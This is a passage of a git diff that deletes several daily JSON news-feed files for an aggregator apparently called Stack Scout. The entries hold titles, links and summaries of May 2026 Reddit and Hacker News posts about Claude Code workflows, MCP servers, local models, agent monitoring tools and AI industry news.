So I changed my workflow. For big decisions, I first use ChatGPT 5.5 to analyze the architecture, challenge the idea, and create a clear draft or roadmap. Then I take that draft to Claude Code and ask it to verify it against the real codebase. Claude Code usually improves the practical details: service names, controllers, helpers, file paths, implementation constraints, and possible conflicts. After that, I ask Claude Code to create an implementation guide before touching the code. I review that guide again, then I let Claude Code execute step by step with a checklist. From my experience in this project, this fe…", - "category": "ai_tools" - }, - { - "title": "Anybody else noticing how good gemma-4-26b-a4b is with one-shotting three.js?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9cle9/anybody_else_noticing_how_good_gemma426ba4b_is/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-10T17:07:14.000Z", - "summary": "I wrote up this little python app to cycle through a bunch of prompts like this: |Single HTML file using three.js from CDN. A central rotating MeshNormalMaterial torus knot. Place a bright Sprite (AdditiveBlending, soft circular canvas texture) at a position projected to screen, and 6 smaller sprites along the line from that position to screen center, each with different sizes/tints. Update positions each frame.| |:-| I have a .csv in there file with 80 or so of these little prompts to cycle through - It writes the code into a mock terminal window, detects a crash if needed, and then shows and archives the finished hmtl file. Really fun to mess around with. 
Link above is to a static demo - github page is here [https://github.com/RowanUnderwood/auto\\_demo\\_scener](https://github.com/RowanUnderwood/auto_demo_scener) No cherry picking here so there may be a few dead ones slipped into the archive :D", - "category": "ai_models" - }, - { - "title": "Weekend project: behaviour trees for LLM agents", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9ch5y/weekend_project_behaviour_trees_for_llm_agents/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-10T17:02:57.000Z", - "summary": "Just throwing this out there. I kept hitting a wall with my GitLabCE pipeline based Dev Team with smaller models (Saving $$$), whenever they tackled big work like a feature implementation task, somewhere in the middle they forget half the guardrails. More instructions made it worse. I've got some background in game AI and behaviour trees, and BTs solve this exact problem specifically by feeding instructions during traversal of the tree structure and outcomes at each node picks the path it goes down, the leaf encodes the instruction, the agent only ever sees the next instruction. I found if I had a project on GitHub and a Project on GitLab the agent just got really confused wasting tokens trying to figure out where to commit etc. So I spent a weekend working on the idea. abtree is a CLI. You write the workflow as a YAML tree. The agent uses the CLI to walk getting instructions one step at a time and persisting the cursor (current place in tree) and regenerating a Mermaid trace on every state change. 
One of the big things I like is it can essentially pause and resume executions so for example you can have raise an MR mid workflow, where I then approve the change, and then my pipelin…", - "category": "ai_tools" - }, - { - "title": "I made Claude Code aware of its own usage limits", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9ayg8/i_made_claude_code_aware_of_its_own_usage_limits/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update" - ], - "matching_tags": [ - "api_update" - ], - "importance": 1, - "date": "2026-05-10T16:05:13.000Z", - "summary": "Something that's been annoying me for a while: Claude Code has no idea how much quota it's burned. You can see the usage bars in the UI, but the model itself is completely blind to them. There's no API, no tool, no hook that exposes the current rate limit state during a conversation. Turns out Anthropic returns rate limit headers on every inference response (\\`anthropic-ratelimit-unified-5h-utilization\\`, \\`anthropic-ratelimit-unified-7d-utilization\\`, etc.) — Claude Code receives them internally to render the UI bars, but never passes them anywhere the model can see. So I built a small local HTTP proxy that sits between Claude Code and \\`api.anthropic.com\\`. Claude Code already respects \\`ANTHROPIC\\_BASE\\_URL\\`, so setting that to \\`http://127.0.0.1:4080\\` routes all traffic through the proxy. It intercepts the response headers and writes a one-line status file to \\`\\~/.claude/usage-status.md\\`: \\`\\`\\` 5h=9% 7d=99%! overage=0% bottleneck=seven\\_day (10/05/2026, 16:19:04) \\`\\`\\` Claude can then read that file on demand, or you can inject it automatically via a \\`UserPromptSubmit\\` hook so it's present in every prompt. 
Add a rule to your [CLAUDE.md](http://CLAUDE.md) and Claude wil…", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-11.json b/data/news-feed-2026-05-11.json deleted file mode 100644 index 07c5260..0000000 --- a/data/news-feed-2026-05-11.json +++ /dev/null @@ -1,263 +0,0 @@ -{ - "generated": "2026-06-05T00:44:39.131Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-11", - "article_count": 15, - "archived_story_count": 572, - "articles": [ - { - "title": "Orc (working name) - auditable and declarative AI workflow", - "url": "https://reddit.com/r/LocalLLaMA/comments/1ta8v5e/orc_working_name_auditable_and_declarative_ai/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-11T16:44:37.000Z", - "summary": "**I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense?** I’m building a small “Orchestration as Code” repo for LLM workflows. Does this concept make sense? I’ve been working on an early project called ORC, short for Orchestration as Code. I’m at the stage where I’m mainly trying to gauge whether the concept is interesting/useful to other people, especially people running local models, Ollama, llama.cpp, LM Studio, MCP tools, or mixed local/cloud workflows. The basic idea is: Instead of building LLM workflows as Python orchestration soup, or wiring them together in a visual tool, ORC lets you describe workflows declaratively in .orc files. Roughly: Terraform-ish workflow definitions, but for LLM agents and tool use. A workflow can define things like: \\- agents \\- models/providers \\- tools \\- schemas \\- inputs \\- ordered execution steps \\- validation rules \\- output artefacts The goal is not to build a magical autonomous agent framework. The goal is more boring. 
make LLM workflows easier to read, version, review, validate, and run repeatedly. A rough example of the kind of thing I’m aiming for: `agent researcher:` `provider: ollama` `mod…", - "category": "ai_models" - }, - { - "title": "My pre-coding routine with Claude Code, 5 MCP servers before I write a single line", - "url": "https://reddit.com/r/ClaudeAI/comments/1ta3a9x/my_precoding_routine_with_claude_code_5_mcp/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-11T13:26:49.000Z", - "summary": "Been running this routine for months now. Started because I was losing too much time to Claude just guessing. Halluzinated class names, outdated SDK methods, advice that didn't match the codebase I was actually in. So I built a routine I run before I let it write anything. Takes maybe 60-90 seconds. Saved me hundreds of hours by now. 1. Start the session and load memory. A memory MCP carries context across sessions. Last sprint, open decisions, recent learnings, why we picked X over Y three months ago. Without this, every session starts cold and Claude rebuilds my reasoning from scratch, usually wrong. 2. Index the codebase as a graph. A codebase-memory server builds a knowledge graph of the repo. Functions, callers, dependencies, cycles. When Claude needs to know what calls processOrder, it queries the graph instead of grepping blind. One tool call replaces dozens of file reads. 3. Search with Tavily for current practice. Before any non-trivial decision I let it search what people are actually doing right now. Training data is old. Best practices from a year ago aren't always still best practices. Clean answer with sources, not a wall of SEO spam. 4. 
Load Context7 for library doc…", - "category": "ai_tools" - }, - { - "title": "Dunetrace: Real-time monitoring of your production agents", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9wib2/dunetrace_realtime_monitoring_of_your_production/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "api_update", - "open_source", - "tool_update" - ], - "matching_tags": [ - "api_update", - "open_source", - "tool_update" - ], - "importance": 1, - "date": "2026-05-11T07:52:28.000Z", - "summary": "I have been building Dunetrace, a open-source real-time monitoring tool for your production agents. **Problem:** When agent run, they return a confident answer. But sometimes in reality the answer is wrong and consumed lot of tokens due to tool loop or some other silent failures. All the existing tools are good once something is broke and you can debug. I wanted something that alerts before the user notices. The latest update adds: **Cross-agent pattern analysis.** Dunetrace now shows you which detectors are firing across your entire agent fleet, not just per-run alerts. TOOL\\_LOOP fired on 18% of your example-agent runs this week and it's trending up? That's a code bug, not a transient failure. Agent health score 0–100 per agent\\_id. **Langfuse deep analysis.** Connect your Langfuse API key and you get an 'Explain with Langfuse' button on every signal. Dunetrace fetches the trace, reads the actual system prompt, and tells you exactly whats missing. You get the root-cause from real evidence. **Custom typescript, python agent integration**. A few of you were building custom agents outside LangChain. There's now a zero-dependency integration. 
**GitHub repo:** [https://github.com/dun…", - "category": "creative_tools" - }, - { - "title": "I catalogued every way local models break JSON output and built a repair library, here's what I found across 288 model calls", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tagtpv/i_catalogued_every_way_local_models_break_json/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-11T21:17:18.000Z", - "summary": "I've been running structured output prompts through a bunch of models on OpenRouter for the past few months — Llama 3, Mistral, Command R, DeepSeek, Qwen, and every other model on OpenRouter — alongside the usual closed-source suspects. 288 calls total. I wanted to know what actually breaks, how often, and whether open models fail differently from the API-only ones. Short answer: not really. The failure modes are almost identical across the board. The *rate* varies — some models hit you with markdown fences on nearly every call, others only when you phrase the prompt a certain way; but the categories of breakage are the same everywhere. What I saw most, roughly in order: 1. Markdown fences wrapping the JSON (the model thinks it's being helpful) 2. Trailing commas (JS habits from training data) 3. Python `True`/`False`/`None` instead of JSON `true`/`false`/`null` 4. Truncated objects from running out of tokens mid-response 5. Unescaped quotes inside string values 6. `//` or `#` comments inside JSON 7. 
Literal `...` where the model got lazy and didn't generate all the data The reason I'm posting here specifically: most of the advice I see for handling this is \"just use JSON mode\" or…", - "category": "ai_models" - }, - { - "title": "What improved my Claude Code workflow: stop treating it like chat, start treating it like a dev with a workstation", - "url": "https://reddit.com/r/ClaudeAI/comments/1taelgl/what_improved_my_claude_code_workflow_stop/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-11T19:59:39.000Z", - "summary": "The most useful improvement I’ve found for Claude Code-style work has not been a magic prompt. It has been changing the shape of the task. When I give an agent a vague request, I get vague work. When I give it a real workstation + a real ticket, the results get much more predictable. The workflow that has been working for me: **1. Start with a ticket, not a prompt** A good ticket has: * goal * exact repo/path/context * acceptance criteria * test command * files or areas that are off-limits * expected output * whether the agent is allowed to make changes or only investigate Example: “Find why the billing page shows an empty state for active subscriptions. Do not change pricing or Stripe webhook logic. Add a regression test if possible. Run npm test. Summarize the root cause and changed files.” That tends to work much better than: “Fix the billing page.” **2. Give the agent a persistent environment** A lot of coding-agent work is not pure reasoning. It is environment work: * clone repo * install dependencies * inspect file structure * run tests * inspect logs * patch * rerun * generate output When the environment disappears after the conversation, the agent loses useful state. 
A per…", - "category": "ai_tools" - }, - { - "title": "The Claude Platform on AWS is now generally available.", - "url": "https://reddit.com/r/ClaudeAI/comments/1ta7p4n/the_claude_platform_on_aws_is_now_generally/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-11T16:03:57.000Z", - "summary": "AWS customers get the full set of Claude API features, with AWS authentication, billing, and commitment retirement. Build and deploy agents at scale with Claude Managed Agents, or use features like the advisor strategy, code execution, web search, web fetch, the Files API, MCP connector, prompt caching, citations, and batch processing. Anthropic operates the service, and all new features ship the same day they go live on the native Claude API. Claude also remains available on Amazon Bedrock, where AWS is the data processor. This is a good fit for teams with strict regional data residency requirements or that need data processed exclusively within AWS infrastructure. Read more: [https://claude.com/blog/claude-platform-on-aws](https://claude.com/blog/claude-platform-on-aws)", - "category": "ai_tools" - }, - { - "title": "Claude Code Orchestrator -> Sub-agent local LLM", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9xyku/claude_code_orchestrator_subagent_local_llm/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-11T09:17:33.000Z", - "summary": "Not written by an AI, so bear with me :P Has anyone else tried to use their local LLM in conjunction with Claude Code? I looked into [Pi.dev](http://Pi.dev) a bit, and from their documentation, I read about their RPC Mode which allows me to send command line commands to it. So I'm thinking of making a MCP Claude Code can utilize to use [Pi.Dev](http://Pi.Dev) as a sub-agent and save a bit of usage. 
My line of thinking is: Claude Code orchestrator -> Local LLM -> Claude Code reviewing the code in the PR. Anyone tries this? Am I missing something or am I a monday morning genious?", - "category": "ai_models" - }, - { - "title": "Anyone else think the 1T Valuation is dangerous for Anthropic?", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9vuw5/anyone_else_think_the_1t_valuation_is_dangerous/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-11T07:14:55.000Z", - "summary": "TLDR: The market's 1T valuation is pricing for perfection. I think there are 4 ways this perfection doesn't happen. I love Claude and Claude Code, I use it every day, and their revenue numbers (30B ARR) are amazing, and if I had a chance to invest in Anthropic a month ago, I would. But... now it is reaching **1 Trillion** valuation on secondary market. It took Apple 40 years to reach, 5 years for Anthropic. A valuation so high means it has limited growth. It's clearly driven by FOMO. If it has a down round, it would be a disaster. I see a few vulnerabilities that can cause Anthropic to go down. 1. **Models are improving but others are catching up** Opus 4.7 wasn't a big upgrade, and \"Mythos\" still isn't public. Competitors are closing fast, and switching is one click away. If a new model launched tomorrow at 80% of Claude's quality and 3% the cost, I'd hesitate. But at 95% quality and 50% cost? I'd switch the same day. And so would everyone else paying enterprise rates. 2. **Limited revenue sources** Of that $30B ARR, the open guess is 60%+ comes from Claude Code and developer API. 
That's a single customer segment, and it's the exact segment OpenAI, Google, and every well-funded s…", - "category": "ai_tools" - }, - { - "title": "Markdown browser for LLMs", - "url": "https://reddit.com/r/LocalLLaMA/comments/1t9tsro/markdown_browser_for_llms/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "mcp", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-11T05:23:15.000Z", - "summary": "I built a markdown web renderer for AI agents. Instead of taking expensive screenshots and piping them through vision models, TextWeb renders web pages as markdown that LLMs can reason about natively. Full JavaScript execution, interactive elements annotated. It provides a CLI and an MCP server. You can find it here: [https://github.com/woheller69/textweb](https://github.com/woheller69/textweb) The LLM can do things like: navigate a web page, scroll up/down, enter text into input fields, click buttons, etc. Works with llama.cpp web UI. It is based on [https://github.com/chrisrobison/textweb](https://github.com/chrisrobison/textweb) which has a text grid renderer instead of markdown.", - "category": "ai_models" - }, - { - "title": "I upgraded my Agent OS to a local 35B model and its code failure rate dropped to 0%", - "url": "https://reddit.com/r/ClaudeAI/comments/1t9tqz6/i_upgraded_my_agent_os_to_a_local_35b_model_and/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-11T05:20:39.000Z", - "summary": "I’ve been obsessed with autonomous agents lately, but it got tiring when they keep hitting walls because they didn't have the right \"tools\" or because their context window turned to mush after an hour. 
I’ve found that local multi-agent systems where agents are driven by an aversive state (a suffering system) to autonomously write, sandbox, and hot-load their own tools so they don't hit walls has worked quite well. When an agent encounters something it hasn’t seen before, it builds a new tool for the job, tests it in a sandbox, registers it, lets the other agents know, then keeps rolling. It’s able to build an infinite library of anything it may need in the future, completely autonomously without a human ever in the loop. Repo: [https://github.com/ninjahawk/hollow-agentOS](https://github.com/ninjahawk/hollow-agentOS) *Isn’t letting local LLMs write their own code at runtime going to get too chaotic and brick the OS fast?* With a small model (like the 9B fallback), possibly. Under high system stress, a 9B model panics. It rushes, hallucinates invalid function calls, and tries to force broken syntax past the gates. But I just scaled the default runtime engine to **Qwen 3.6 35B A3B**…", - "category": "ai_tools" - }, - { - "title": "Natural Woman V2 - Z Image Turbo Lora", - "url": "https://reddit.com/r/StableDiffusion/comments/1t9oono/natural_woman_v2_z_image_turbo_lora/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-11T01:14:23.000Z", - "summary": "Hey all, I finally got around to training a new version to my natural woman lora. The point being to fix the actor face that ZIT can tend to produce. The first version was ok but there were many cases where the image produced was lack luster or downright bad. This version accomplishes the goal while not corrupting the model. Download it here: [https://civitai.com/models/2207094?modelVersionId=2935386](https://civitai.com/models/2207094?modelVersionId=2935386) Only thing is, models tend to look back over shoulder even when prompted to face forward. 
I'm pruning the dataset to train a 2.1 version to fix this so look out for that. Also, while I've found that the actor face does not affect men as much as woman, I am training a natural-men lora as well. Look out for that soon.", - "category": "creative_tools" - }, - { - "title": "I have to pretend I hate image generation AI to avoid getting banned or insulted on 99% of Reddit or the internet, even though Stable Diffusion is actually what I like and am most excited about right now. Why do people hate AI so much, esp…", - "url": "https://reddit.com/r/StableDiffusion/comments/1tahphc/i_have_to_pretend_i_hate_image_generation_ai_to/", - "source": "Reddit r/StableDiffusion", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-11T21:50:34.000Z", - "summary": "I'm not even saying I care if they know the difference between open-source and closed-source image-generating AI, or if they insult me ​​or not. What I want to know is why so many people hate AI, especially image-generating AI. At first, I thought it only bothered artists, because they're afraid their artwork will be stolen or something. Then I thought it might also bother those who are afraid of not being able to distinguish AI from reality. But it's practically 99% of people who hate AI, and I just can't understand why.", - "category": "creative_tools" - }, - { - "title": "Sibling to Anthropic's Claude FM — where Claude FM curates, WRIT-FM operates", - "url": "https://reddit.com/r/ClaudeAI/comments/1tagr4x/sibling_to_anthropics_claude_fm_where_claude_fm/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "cli_tool" - ], - "matching_tags": [ - "cli_tool" - ], - "importance": 1, - "date": "2026-05-11T21:14:52.000Z", - "summary": "Anthropic shipped `/radio` this week - Claude Code now has a lofi button that opens Claude FM, a stream curated by human musicians. I'll use it. 
I built WRIT-FM - a 24/7 AI radio station where every layer is model output, not a hand-picked playlist: * **Music**: AI-generated. No catalog, no human picks. Tracks produced per show by ACE-Step via a local music-gen server. * **Talk**: Claude CLI writes the hosted breaks - deep dives, news analysis, panel debates, listener mailbags, music essays. Kokoro TTS speaks them in 5 distinct voices. * **Hosts**: The Liminal Operator (philosophy), Dr. Resonance (music archaeology), Nyx (night/dreams), Signal (news analysis), Ember (soul/groove). They rotate across 8 shows. Sundays at 18:00 a Listener Hours mailbag replaces the regular slot. * **Broadcast**: ezstream → Icecast → Cloudflare tunnel → optional YouTube RTMP relay. * **Operator**: a Claude Code agent on a 15-minute loop. Health-checks the encoder, stocks music and talk segments for upcoming slots, turns listener messages into on-air responses, grows per-station topic banks when scheduled focus areas thin out, and writes *intent cards* that steer specific upcoming segments. The piece I…", - "category": "ai_tools" - }, - { - "title": "prompt caching, but for rl training - 7.5x speedup on long-prompt/short-response workloads", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tage06/prompt_caching_but_for_rl_training_75x_speedup_on/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source" - ], - "matching_tags": [ - "open_source" - ], - "importance": 1, - "date": "2026-05-11T21:01:45.000Z", - "summary": "most open source RL engines pack sequences naively: prompt + response, repeated for every sample in the group. this is fine for short prompt, long completion workloads but inefficient for long prompt, short completion workloads. with 1000-token prompts and 100-token responses at G=8, you're processing 8800 tokens when only 1800 are unique. about 5x wasted compute. the fix is conceptually simple: compute the prompt once, then compute all G responses after it. 
it's analagous to inference prefix caching, except training needs gradients to flow back through the prompt, which breaks causal attention in the obvious implementation. getting it right required different tricks for full vs. linear attention layers. you can read about it in the blogpost in the comments. Numbers on Qwen3.5-4B: \\- 16k prompt / 64 out → 7.5x \\- 16k / 128 → 7.3x \\- 16k / 1k → 5.4x \\- 8k / 4k → 1.7x", - "category": "ai_models" - }, - { - "title": "GitLab announces workforce reduction and end of their CREDIT values", - "url": "https://about.gitlab.com/blog/gitlab-act-2/", - "source": "Hacker News", - "tags": [ - "product_launch" - ], - "matching_tags": [ - "product_launch" - ], - "importance": 1, - "date": "2026-05-11T20:51:57.000Z", - "summary": null, - "category": "tech_general" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-12.json b/data/news-feed-2026-05-12.json deleted file mode 100644 index 6fbf421..0000000 --- a/data/news-feed-2026-05-12.json +++ /dev/null @@ -1,259 +0,0 @@ -{ - "generated": "2026-06-05T00:44:39.379Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-12", - "article_count": 15, - "archived_story_count": 612, - "articles": [ - { - "title": "TUI to actually see what Claude Code is doing: cost, loops, tool commands…", - "url": "https://reddit.com/r/ClaudeAI/comments/1tb669z/tui_to_actually_see_what_claude_code_is_doing/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "cli_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-12T16:08:47.000Z", - "summary": "I was running blind watching Claude Code work, could not tell where my money was going, when it was stuck in a loop, or what it was doing with my filesystem. So i built something open source to make it visible. works with Claude Code, Codex CLI, Gemini CLI, Cursor, and any MCP server. 
A scan of my own machine for the last 90 days showed what i do been missing: \\- $14K spend across 39 sessions \\- 129 agent loops, \\~20% wasted iterations (mostly Edit-in-circles on the same 5 files) \\- 3 credential leaks in tool input (JWTs, GitHub tokens, GCP keys) \\- 5 sensitive paths an AI could reach at any moment (\\~/.ssh, \\~/.npmrc, gcloud creds) \\- 2 dangerous commands node9 would have blocked Now i can: \\- See where my money is going in real time \\- Catch the most dangerous commands before they finish running \\- Stop or continue a run while it's happening \\- Analyze the data after the fact, any time range The live dashboard: \\- High level: cost, tokens, command counts, all live \\- Notifications: loops + critical commands surface here so i can make a call before things go sideways \\- Live feed: the commands Claude is running right now \\- Live security: dangerous actions the AI is taking \\- Liv…", - "category": "ai_tools" - }, - { - "title": "I built a Mac app that turns Claude Code agents into live radio stations | Free & open source", - "url": "https://reddit.com/r/ClaudeAI/comments/1tasoqo/i_built_a_mac_app_that_turns_claude_code_agents/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-12T06:01:21.000Z", - "summary": "**TL;DR:** Agent FM is an open-source Mac app that lets you tune in to your Claude Code and Codex agents while they work, so you can stay in the loop and hear their progress live. Each agent gets its own live radio station. You can tune in to one agent, or listen to a Global Mix across all active agents. It surfaces progress, blockers, decisions, errors, and attention requests in real time. GitHub: [https://github.com/agentfm-ai/agent-fm](https://github.com/agentfm-ai/agent-fm) Hey everyone! 
How do you stay in the loop when multiple AI coding agents are running at the same time? That was the problem I kept running into. At some point, it became normal to have several Claude Code and Codex sessions running at once across different repos. Sometimes 8-10. The agents move quickly, but staying on top of them still means reading terminal transcripts across a bunch of windows. That workflow was broken in a very specific way: * I would miss which agent was blocked. * I would miss which one needed approval. * I would lose track of which files changed. * I would have to context-switch between terminals just to answer \"what is this agent doing right now?\" * The agents could run in parallel,…", - "category": "ai_tools" - }, - { - "title": "Steam Recommender using similarity! (Undergraduate Student Project) [P]", - "url": "https://reddit.com/r/MachineLearning/comments/1tb8k3n/steam_recommender_using_similarity_undergraduate/", - "source": "Reddit r/MachineLearning", - "tags": [ - "github_release", - "tool_update" - ], - "matching_tags": [ - "github_release", - "tool_update" - ], - "importance": 1, - "date": "2026-05-12T17:30:32.000Z", - "summary": "(DISCLAIMER: I accidentally deleted the last post on this subreddit my apologies if this is your second time seeing it) Last year I made a [post](https://www.reddit.com/r/datascience/comments/1lkjxmr/steam_recommender_using_vectors_student_project/) about my steam recommender The last one was great and served its purpose of showing many people new games, But this new version is much more functional! I love making recommendation systems that tell the user WHY they got the recommendation. During a steam sale event, I always find myself trying to look for new video games to play. If I wanted to find a new game I would try to whittle it down by using steam tags, but the steam tag system is very broad \"action\". could apply to many many games. That got me thinking, what aspects do I like about my favorite games? 
Well I like Persona 4 because of the city vibes and jazz fusion, Spore because of the unique character creation and whimsical theme. Balatro for its unique deck building synergies. What if I could capture unique tags that identify a game that aren't just \"action\" and put them into vectors to show the (focus) of a game For example I could break persona 4 into something like Game…", - "category": "ai_research" - }, - { - "title": "Elgato Stream Deck Usage Plugin", - "url": "https://reddit.com/r/ClaudeAI/comments/1tb6exu/elgato_stream_deck_usage_plugin/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-12T16:16:59.000Z", - "summary": "Wanted an easier way of keeping an eye on my usage, so created this plugin for the Elgato Stream Deck. Five keys, exact percentages from your account: current 5-hour session, weekly all-models, weekly Sonnet, weekly Claude Design, monthly extra credits. Each shows a reset countdown. Tap any key to open the Settings page directly. It calls Anthropic's own usage endpoint with the OAuth token Claude Code already stores locally — same data the Settings page shows, no separate API key, nothing leaves your machine. Windows + Mac, classic Stream Decks (MK.2 / XL / Mini / Neo). One-click installer + source: [https://github.com/Darhkfox/streamdeckclaude](https://github.com/Darhkfox/streamdeckclaude) *Caveat: the endpoint is undocumented so Anthropic could break it. Works fine today.* Enjoy! 
(also the first time i've used github so hope all works fine!)", - "category": "ai_tools" - }, - { - "title": "Can we acknowledge that Anthropic watches open sourcers and copies them?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tayk1l/can_we_acknowledge_that_anthropic_watches_open/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source" - ], - "matching_tags": [ - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-12T11:19:48.000Z", - "summary": "I’ve been seeing over the past few months an interesting phenomenon, an open sourcer makes a tool or MCP < Anthropic adds functionality for that exact thing a couple weeks later < repeat. The biggest examples are Openclaw (like 5 features, including cowork), persistent memory across chats, and latest example of the “goal” feature being added. This is obvious and I’m not really saying anything that’s revolutionary here, I’m sure we’ve all noticed it. My larger observation, no credit is given, they’re just copying and then providing a direct replacement for things open sourcers thought of. At this level, we’re all learning from each other. AI like it is right now is very new and you could even argue that they’re not copying, that we’re all just thinking the same things. The deeper issue though is that this shows a dystopian effect of AI, the big companies get the credit widely for things others have done. More people have heard about Claude cowork than have heard about Openclaw, and the result of the guy who made it was getting a job at OpenAI. He wasn’t able to make this into a business, it’s not how open source has been for the past 20 years where an idea can be copied but n…", - "category": "ai_tools" - }, - { - "title": "Cache-testing software for LLM-provider-style tiered ephemeral caches? 
[D]", - "url": "https://reddit.com/r/MachineLearning/comments/1tayaiw/cachetesting_software_for_llmproviderstyle_tiered/", - "source": "Reddit r/MachineLearning", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-12T11:07:23.000Z", - "summary": "I'm looking for a cache simulator / benchmark suite suited to the kind of tiered ephemeral cache that LLM providers use — e.g. Anthropic's 4-tier prompt cache, where context sits across several tiers with different residency windows, costs, and eviction rules. I've already tried **libCacheSim**. It's a solid piece of software for classical caches (LRU, FIFO, ARC, SIEVE, S3-FIFO, W-TinyLFU, Belady oracle, plugin API, trace replay), and I got a plugin + synthetic trace working against it. But it seems fundamentally aimed at single, flat caches: * One cache, not a hierarchy of tiers with different costs * No notion of partial / multi-tier residency of the same object * Misses are uniform-cost — no way to express \"miss to L1 vs miss to L3 vs full recompute,\" which is the whole point in LLM prompt caching * Trace model is atomic get/put, not edit streams where cached objects mutate in place * No first-class support for token-weighted object sizes So it works as a baseline comparator, but it's not really the right shape for evaluating LLM-cache policies. 
**Does anyone know of cache-testing software specifically targeting LLM-provider-style caches?** Something that models multiple tiers…", - "category": "ai_research" - }, - { - "title": "Claude MCP integration made my old meeting notes actually useful again", - "url": "https://reddit.com/r/ClaudeAI/comments/1tb2ns8/claude_mcp_integration_made_my_old_meeting_notes/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "tool_update" - ], - "matching_tags": [ - "mcp", - "tool_update" - ], - "importance": 0.99, - "date": "2026-05-12T14:05:14.000Z", - "summary": "I’ve been testing the new Claude MCP integration with Bluedot and it changed how I use meeting notes completely. Before this, most meeting transcripts just sat there after the call. Now I can chat with all my past meetings directly inside Claude, pull context from old discussions, search decisions, action items, summaries, recordings, and combine that with info from other tools too. What I like about Bluedot is that it stays out of the meeting itself, no bot joining the call, but still captures everything cleanly in the background. The searchable meeting history is honestly the biggest feature for me now. Anyone else experimenting with Claude MCP workflows yet?", - "category": "ai_tools" - }, - { - "title": "Converted Karpathy's coding skill from Pro to free plan. Here's the full thing:", - "url": "https://reddit.com/r/ClaudeAI/comments/1tavcuo/converted_karpathys_coding_skill_from_pro_to_free/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 0.99, - "date": "2026-05-12T08:29:36.000Z", - "summary": "The Karpathy coding skill is locked behind Pro. It doesn't use any Pro-only features, so I rewrote it for free plan chat workflows. Same philosophy, tuned for no terminal, no subagents, and a shorter context window where mistakes are expensive. 
